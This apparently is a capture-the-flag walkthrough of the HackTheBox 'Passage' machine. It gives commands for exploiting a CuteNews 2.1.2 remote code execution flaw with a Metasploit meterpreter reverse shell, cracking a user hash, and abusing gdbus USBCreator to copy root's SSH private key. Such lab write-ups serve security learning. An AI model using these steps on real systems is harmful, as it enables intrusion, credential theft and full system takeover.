Passage HackTheBox WalkThrough
This is Passage HackTheBox machine walkthrough. In this writeup, I have demonstrated step by step how I rooted to Passage HTB machine. Before starting let us know something about this machine. It is
Linux box with IP address
10.10.10.206 and security level
medium assigned by its maker.
First of all, connect your local machine with VPN so that you can access to the lab machines and confirm the connectivity of passage machine by pinging the IP address 10.10.10.206. If all correct then start hacking.
As usual, I began by scanning the IP address so that I could get some starting points. Used
nmap for this task and the result is below.
$ nmap -sC -sV -oN passage_scan 10.10.10.206
Nmap revealed that port
80 is open.
SSH server is running over port 22 and
apache2 web server is running over port 80. As apache web server is running over port 80 so there must be some website hosted on this machine IP. Ongoing to URL http://10.10.10.206/ found a webpage showing
Scrolling to the bottom got information Powered by :
CuteNews. Then immediately googled about
CuteNews and found that it is an
Open Source Content Management System (CMS) for hosting news articles. Since, it is a CMS then there must be some user(s) who write blog post on this website. After spending sometimes got two email address
[email protected] &
So we have two users namely
nadav extracted from their emails. Added them to my notes. And proceeded for further enumeration. Checked the
page-source by pressing
CTRL+U and found URL http://10.10.10.206/CuteNews that is the installation folder of CuteNews. Ongoing to this page found
login options and version of running
As I get some information about any software or CMS then I immediately search for public exploits for that software. So used
$searchsploit [a CLI tool to query exploit-db database] for searching exploit of CuteNews 2.1.2.
Searching Public Exploit
$ searchsploit CuteNews 2.1.2
There is a
Remote Code Execution exploit for
CuteNews 2.1.2 and it also has
metasploit module. So launched metasploit to exploit this vulnerability. But, when searched for CuteNews in metasploit gave message
No results found from search.
Since this module is not present in metasploit-framework so, we have to explicitly, download and add this exploit to our metasploit-framework. The exploit link is https://www.exploit-db.com/download/46698 . Followed the below steps to integrate the module in metasploit.
msf5 > search cutenews
msf5 > wget 'https://www.exploit-db.com/download/46698'
msf5 > mv 46698 /usr/share/metasploit-framework/modules/exploits/unix/webapp/cutenews_avatar_rce.rb
We have to add comma [,] to this exploit because there is a syntax error in it, see this issue at rapid7 repo.
msf5 > vi /usr/share/metasploit-framework/modules/exploits/unix/webapp/cutenews_avatar_rce.rb
After adding the exploit and making changes we have to reload all modules.
msf5 > reload_all
msf5 > search cutenews
Now we have successfully added CuteNews RCE exploit to our metasploit-framework. After loading CuteNews module when used
$show options, to list available options, it also includes
PASSWORD. So CuteNews 2.1.2 has actually an
vulnerability because it requires username and password too. As we already have a register button at URL http://10.10.10.206/CuteNews so, registered a user by the name
test1 & password
It is time to get meterpreter shell. Used the above credential to get shell.
msf5 > use exploit/unix/webapp/cutenews_avatar_rce
msf5 exploit(unix/webapp/cutenews_avatar_rce) > set RHOSTS 10.10.10.206
msf5 exploit(unix/webapp/cutenews_avatar_rce) > set payload php/meterpreter/reverse_tcp
msf5 exploit(unix/webapp/cutenews_avatar_rce) > set LHOST 10.10.14.191
msf5 exploit(unix/webapp/cutenews_avatar_rce) > set USERNAME test1
msf5 exploit(unix/webapp/cutenews_avatar_rce) > set PASSWORD test1
msf5 exploit(unix/webapp/cutenews_avatar_rce) > set VHOST 10.10.14.191
msf5 exploit(unix/webapp/cutenews_avatar_rce) > exploit
meterpreter > sysinfo
Note: If your meterpreter shell don’t work then background the shell and try to exploit again & again 3-4 times. Even if not works then use unstaged payload php/meterpreter_reverse_tcp instead of staged payload.
Got meterpreter shell. Upgraded the shell to fully qualified Linux shell so that I could run all linux command remotely.
meterpreter > shell
~python -c 'import pty;pty.spawn("/bin/bash")'
$ export TERM=xterm-256color
$ CTRL+Z //to background the shell
$ stty raw -echo
$ fg //plus two times enter to foreground the session
After some enumeration got a file named
lines inside directory
/var/www/html/CuteNews/cdata/users/. It contains information of all the users in
base64 encoded form. After decoding found
SHA256 hash of user paul.
$ cat /var/www/html/CuteNews/cdata/users/lines
Luckily, got the password from Crackstation for this hash.
So we have credential
Switched the user to
paul using the password
$ su paul
Capture User Flag
$ cat user.txt
After some initial enumeration found that authorized_keys file of user paul contains key of user nadav. It means user paul can connect to user nadav locally via SSH.
$ ssh [email protected]
Successfully logged in to nadav through
SSH. We are nadav now.
After some, more enumeration did not found any privilege escalation vector. So ran
linpeas.sh [a post exploitation enumeration script] for help and it found
gdbus could be used to escalate privilege. Did not know how to escalate privilege-using gdbus. So googled
privilege escalation using gdbus and got this first article.
According to this article, gdbus allows a user to overwrite arbitrary files on the file system, as root, with no password prompting. Or we can say any user can copy content of root user without any password. So I used this command to copy
id_rsa key of root user so that using this key I could SSH to root.
$ gdbus call --system --dest com.ubuntu.USBCreator --object-path /com/ubuntu/USBCreator --method com.ubuntu.USBCreator.Image /root/.ssh/id_rsa /tmp/key.txt true
$ cat /tmp/key.txt
We have got private key of user root. So copied this key inside the file
root_key on my local PC. And after changing the permission of file root_key to
600 connected to root using SSH.
$ vi root_key
$ chmod 600 root_key
$ ssh -i root_key [email protected]
[email protected]:~# whoami && id
We have successfully escalated the privilege to root. Now we can capture root flag.
Capture Root Flag
$ cat root.txt
This is how I rooted to Passage HackTheBox. Learnt a lot after hunting this box. Hope you guys have also learnt some new things from this box. Thanks for reading this writeup. For any suggestion and query related to walkthrough, feel free to contact us at [email protected].
You can read walkthrough of similar machine from here.